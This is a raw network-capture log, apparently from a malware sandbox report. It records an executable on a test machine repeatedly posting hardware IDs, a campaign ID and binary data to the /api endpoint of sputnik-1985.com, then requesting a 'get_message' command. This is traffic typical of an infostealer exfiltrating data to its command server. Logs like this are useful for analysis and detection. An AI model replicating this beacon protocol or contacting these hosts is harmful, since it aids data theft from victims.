                                                                                                                                                                                                                  2025-01-10 10:47:51 UTC1369INData Raw: 38 30 37 0d 0a 63 34 4e 66 45 76 38 54 6d 6d 6a 49 43 4c 4e 79 4f 4a 67 51 34 43 55 63 58 52 4c 50 76 45 62 74 36 46 63 42 6e 5a 72 48 4b 34 65 55 68 32 36 47 4b 6d 43 2b 66 36 2f 70 70 30 59 70 4c 50 46 48 4e 79 79 38 38 68 2b 64 56 42 72 61 68 68 41 4e 47 70 64 66 68 33 52 6a 43 6e 65 71 35 38 35 37 61 76 35 57 4a 79 32 4e 51 5a 59 42 43 59 6b 7a 43 77 32 68 44 32 79 79 39 66 6b 4f 4a 6d 2b 47 46 47 63 65 6b 76 2f 7a 47 70 73 61 79 33 50 43 47 63 6a 41 73 4e 65 65 6e 4d 4a 50 4c 4f 58 2b 75 31 53 53 7a 54 71 58 69 31 4e 67 30 49 32 54 66 39 50 4b 6d 31 71 4c 52 36 62 4d 71 41 44 47 74 2b 69 49 6c 76 77 59 30 51 2b 4d 73 76 54 65 75 68 65 72 59 2b 45 43 65 71 41 2f 4d 35 71 37 2b 78 72 6e 70 73 79 6f 6b 4d 61 78 65 47 67 53 76 76 67 77 69 77 32 53 78 59
                                                                                                                                                                                                                  Data Ascii: 807c4NfEv8TmmjICLNyOJgQ4CUcXRLPvEbt6FcBnZrHK4eUh26GKmC+f6/pp0YpLPFHNyy88h+dVBrahhANGpdfh3RjCneq5857av5WJy2NQZYBCYkzCw2hD2yy9fkOJm+GFGcekv/zGpsay3PCGcjAsNeenMJPLOX+u1SSzTqXi1Ng0I2Tf9PKm1qLR6bMqADGt+iIlvwY0Q+MsvTeuherY+ECeqA/M5q7+xrnpsyokMaxeGgSvvgwiw2SxY


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  3192.168.2.949844104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:52 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=93F28NVF3FRCC6S
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 12834
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:52 UTC12834OUTData Raw: 2d 2d 39 33 46 32 38 4e 56 46 33 46 52 43 43 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 39 33 46 32 38 4e 56 46 33 46 52 43 43 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 33 46 32 38 4e 56 46 33 46 52 43 43 36 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a
                                                                                                                                                                                                                  Data Ascii: --93F28NVF3FRCC6SContent-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--93F28NVF3FRCC6SContent-Disposition: form-data; name="pid"2--93F28NVF3FRCC6SContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d
                                                                                                                                                                                                                  2025-01-10 10:47:53 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:53 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=abmn6h2r4e7thpnqv7o2s5jcvv; expires=Tue, 06 May 2025 04:34:32 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lA7Rv%2B17%2FGjmCql%2BAxXJWQ7PCBVICZEmUwnAjzS9kYrgmYp7P1cgDxUhGa1Y%2Fim7Ov0GudPPuLui9GtoDsMIc4VUzRuYPZZru1xo6JTOokmlISBl22J1C0ynKsKCxnssIyv%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc176afaea1a48-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1978&rtt_var=754&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13771&delivery_rate=1439842&cwnd=157&unsent_bytes=0&cid=77e86f1cf0f7a684&ts=576&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:53 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                  2025-01-10 10:47:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  4192.168.2.949850104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:53 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=QJOBUM86SESDBVW93
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 15064
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:53 UTC15064OUTData Raw: 2d 2d 51 4a 4f 42 55 4d 38 36 53 45 53 44 42 56 57 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 51 4a 4f 42 55 4d 38 36 53 45 53 44 42 56 57 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 4a 4f 42 55 4d 38 36 53 45 53 44 42 56 57 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                                                                                                                                                                  Data Ascii: --QJOBUM86SESDBVW93Content-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--QJOBUM86SESDBVW93Content-Disposition: form-data; name="pid"2--QJOBUM86SESDBVW93Content-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                                                                                                                                                                  2025-01-10 10:47:54 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:54 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=bbhtisrejk3jas8kppcmstnkgu; expires=Tue, 06 May 2025 04:34:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KpN%2Fwgc8BnL32mauLH4y31v7mToOafO8sL1yhwgw1o%2B7kVLbm%2B89JixiZoHdfrxFeK3ZEjhIZJu3nelHVpBfdC8C1rjIA490XN2I8ZuydOa7cIkbQU4pfM3gSJoTeE8%2BPRQl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc1772c97c72a4-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=1976&rtt_var=771&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16003&delivery_rate=1477732&cwnd=212&unsent_bytes=0&cid=cc985e465a8ae0f3&ts=518&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                  2025-01-10 10:47:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  5192.168.2.949861104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:55 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=5BM7KYTRHVLKF0TSQY4
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 20592
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:55 UTC15331OUTData Raw: 2d 2d 35 42 4d 37 4b 59 54 52 48 56 4c 4b 46 30 54 53 51 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 35 42 4d 37 4b 59 54 52 48 56 4c 4b 46 30 54 53 51 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 35 42 4d 37 4b 59 54 52 48 56 4c 4b 46 30 54 53 51 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61
                                                                                                                                                                                                                  Data Ascii: --5BM7KYTRHVLKF0TSQY4Content-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--5BM7KYTRHVLKF0TSQY4Content-Disposition: form-data; name="pid"3--5BM7KYTRHVLKF0TSQY4Content-Disposition: form-data; name="lid"HpOoIh--2a
                                                                                                                                                                                                                  2025-01-10 10:47:55 UTC5261OUTData Raw: 08 13 c6 1b 09 3d 51 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                  Data Ascii: =QB-?YYj$|lQJ$nInVZ+?:us}Q0u?4E([:s~
                                                                                                                                                                                                                  2025-01-10 10:47:55 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:55 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=bevqekfcb637he51pu3p8q9l99; expires=Tue, 06 May 2025 04:34:34 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwkEYB8JJU8Hw59O9NtgknAjK1WlKMc%2Ft22KDuyDa3WhwKn9JLOWa5MiXIPrwQ6EDAyBx16oR%2FFVu%2F9dBlGSfx4rAlat4qeZoV8tQjmJ97390Dwq9j1NIYMjhgUIQfudyom1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc177b5bb01a48-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1991&min_rtt=1982&rtt_var=763&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21555&delivery_rate=1416787&cwnd=157&unsent_bytes=0&cid=49a47b119bdd383e&ts=641&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                  2025-01-10 10:47:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  6192.168.2.949872104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:56 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=GDDJO2CL1PTZAMGOW
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 1231
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:56 UTC1231OUTData Raw: 2d 2d 47 44 44 4a 4f 32 43 4c 31 50 54 5a 41 4d 47 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 47 44 44 4a 4f 32 43 4c 31 50 54 5a 41 4d 47 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 44 44 4a 4f 32 43 4c 31 50 54 5a 41 4d 47 4f 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                                                                                                                                                                  Data Ascii: --GDDJO2CL1PTZAMGOWContent-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--GDDJO2CL1PTZAMGOWContent-Disposition: form-data; name="pid"1--GDDJO2CL1PTZAMGOWContent-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                                                                                                                                                                  2025-01-10 10:47:57 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:57 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=0u3d82vk553kpuicvo8vg23glk; expires=Tue, 06 May 2025 04:34:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gA3wdSNdtxDui40TAke5K2NQoBSqwcqSIayROalOPniYmicPMZ1t5Z0HMwr35nn6NwLeXSmeYJ%2FX7DIul3M07mGmXS%2FwxYY4sJC%2BzI4VMps9aVQkRWIgV42OmU1jki9V%2BgX0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc17840ef74363-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1507&rtt_var=596&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2147&delivery_rate=1791411&cwnd=240&unsent_bytes=0&cid=cb4b43da3f985fd9&ts=740&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                  2025-01-10 10:47:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  7192.168.2.949878104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:58 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=H5JU37N1HB6AHCS
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 1109
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:58 UTC1109OUTData Raw: 2d 2d 48 35 4a 55 33 37 4e 31 48 42 36 41 48 43 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38 0d 0a 2d 2d 48 35 4a 55 33 37 4e 31 48 42 36 41 48 43 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 35 4a 55 33 37 4e 31 48 42 36 41 48 43 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a
                                                                                                                                                                                                                  Data Ascii: --H5JU37N1HB6AHCSContent-Disposition: form-data; name="hwid"BD1F8E61639CC9B7EB3EC5FED8AD62A8--H5JU37N1HB6AHCSContent-Disposition: form-data; name="pid"1--H5JU37N1HB6AHCSContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d
                                                                                                                                                                                                                  2025-01-10 10:47:58 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=knl3s24t0pa8rq7a35hsfgfeft; expires=Tue, 06 May 2025 04:34:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuJ2%2FOqToDlsWyFfh5OoGqA6kfX0uAm%2Bwjgo5oXVsFWN3ItIEhMssqRI3tVV%2B8GQTzr5P%2Boe7VrHIvnZWzRLLdl24J%2FTjOeSCsYYvaVDy5UfgtKvxCYbqX3xdd6G8p%2BxX0MN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc178c3d834363-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1560&rtt_var=629&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2023&delivery_rate=1680092&cwnd=240&unsent_bytes=0&cid=7c9be59970caaaf1&ts=491&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                  2025-01-10 10:47:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  8192.168.2.949889104.21.96.14437372C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2025-01-10 10:47:59 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                  Content-Length: 121
                                                                                                                                                                                                                  Host: sputnik-1985.com
                                                                                                                                                                                                                  2025-01-10 10:47:59 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 42 44 31 46 38 45 36 31 36 33 39 43 43 39 42 37 45 42 33 45 43 35 46 45 44 38 41 44 36 32 41 38
                                                                                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=BD1F8E61639CC9B7EB3EC5FED8AD62A8
                                                                                                                                                                                                                  2025-01-10 10:47:59 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Fri, 10 Jan 2025 10:47:59 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=avpsb8d6jc8caujqmigdkvhh6l; expires=Tue, 06 May 2025 04:34:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  vary: accept-encoding
